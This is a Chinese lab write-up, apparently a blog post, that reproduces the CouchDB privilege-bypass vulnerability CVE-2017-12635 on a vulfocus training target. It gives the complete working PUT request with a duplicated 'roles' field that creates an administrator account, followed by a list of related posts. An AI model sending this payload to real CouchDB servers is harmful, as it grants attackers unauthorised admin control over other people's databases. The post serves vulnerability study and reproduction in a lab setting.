vulfocus靶场couchdb 权限绕过 (CVE-2017-12635)

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

下载postman 工具:https://postman.com/downloads

点击New 点击 HTTP

攻击代码:

PUT /_users/org.couchdb.user:Hacker1 HTTP/1.1
Host: 192.168.30.129:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92

{
  "type": "user",
  "name": "Hacker1",
  "roles": ["_admin"],
  "roles":[],
  "password": "123456"
}

我添加的用户为 Hacker,密码为666666,roles为_admin

数据改包前测试:登陆IP:IP:63073/_utils,出现登陆页面,输入用户名和密码,显示错误

postman 点击send后显示成功:

相关推荐
Atopos`4 个月前
Dubbo,Zookeeper,NSF,Druid,CouchDB未授权访问漏洞(附带修复方法)
安全·zookeeper·dubbo·couchdb·未授权访问·nsf
Aaron_9454 个月前
Apache CouchDB: 一个开源的文档型数据库
开源·apache·couchdb
小狗学士6 个月前
cve_2017_12635-CouchDB垂直权限绕过
couchdb
兜里旺仔没加糖1 年前
【hyperledger-fabric】使用couchDB
运维·fabric·couchdb
Bolgzhang1 年前
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
网络安全·apache·couchdb
上烟雨心上尘1 年前
Windows系统下安装CouchDB3.3.2教程
json·couchdb
rumilc1 年前
数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现
数据库·web安全·elasticsearch·网络安全·couchdb
wsnbb_20231 年前
Hyperledger Fabric 使用 CouchDB 和复杂智能合约开发
智能合约·fabric·couchdb
月光晒了很凉快1 年前
python+couchdb封装了数据库的增删改查方法
数据库·python·couchdb